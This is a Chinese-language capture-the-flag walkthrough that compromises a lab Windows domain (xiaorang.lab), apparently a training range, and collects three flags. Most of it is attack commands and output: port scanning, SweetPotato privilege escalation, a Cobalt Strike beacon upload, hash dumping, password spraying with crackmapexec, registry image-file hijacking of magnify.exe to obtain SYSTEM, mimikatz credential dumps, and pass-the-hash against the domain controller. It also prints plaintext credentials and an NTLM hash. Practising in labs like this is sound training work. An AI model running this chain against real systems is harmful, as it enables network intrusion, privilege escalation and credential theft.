1 | fscan.exe -h 39.98.115.156 -p 1-65535 |
扫出来个弱口令
1 | ___ _ |
数据库提权
数据库直接上MDUT

权限有点低,上甜土豆


读一下admin目录下,发现flag
1 | C:/Users/Public/SweetPotato-Webshell-new.exe -a "type C:\Users\Administrator\flag\flag01.txt" |

内网渗透
传个cs🐎
1 | C:/Users/Public/SweetPotato-Webshell-new.exe -a "C:/Users/Public/beacon.exe" |

传个fscan扫一下
1 | shell C:/Users/Public/fscan.exe -h 172.22.8.0/24 |
1 | ___ _ |
收集用户信息
1 | shell net user |

此时是system起的🐎所以直接dump下来hash就行,直接会话框交互hashdump
1 | [*] Tasked beacon to dump hashes |
看看john在不在线
1 | shell quser || qwinst |
看到john在线,尝试注入进程上线,


看一下网络
1 | shell net use |

读取一下共享文件
1 | shell dir \\TSCLIENT\C |

1 | shell type \\tsclient\c\credential.txt |

1 | xiaorang.lab\Aldrich:Ald@rLMWuy7Z!# |
提示映像劫持,起个代理,kali密码喷洒一下
1 | proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#' |

登陆的话会过期,这边kalirdp登陆改密码和利用impacket改都可以
1 | impacket-smbpasswd xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Calmsec1!' |
1 | proxychains rdesktop 172.22.8.46 |

1 | 172.22.8.15 rdp不上 |
利用第一台win转发上线一下

再用这个监听器,生成个马

把生成的🐎传到8.46上去

运行一下

映像劫持
映像劫持提权,先查看权限:
1 | get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl * |

这里我们发现所有正常登录的用户都可以修改注册表,利用这个性质,修改注册表映像劫持,使用放大镜进行提权,其实也就是把本来用户主页点放大镜启动的magnify.exe替换成C:\windows\system32\cmd.exe,这样就直接提权成system了
1 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" |

接着锁定

点一下放大镜

拿到system

此时再运行上传的马,拿到system的🐎

1 | shell type C:\Users\Administrator\flag\flag02.txt |
拿到第二个flag

1 | logonpasswords |
1 | Authentication Id : 0 ; 996 (00000000:000003e4) |
1 | shell net user /domain |
1 | 这项请求将在域 xiaorang.lab 的域控制器处理。 |
1 | shell net group "domain admins" /domain |
1 | 这项请求将在域 xiaorang.lab 的域控制器处理。 |
发现win2016在域管里,dump一下hash直接打pth即可
1 | proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 40af44e61e8174dfa92f90a696be81e8 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt" |
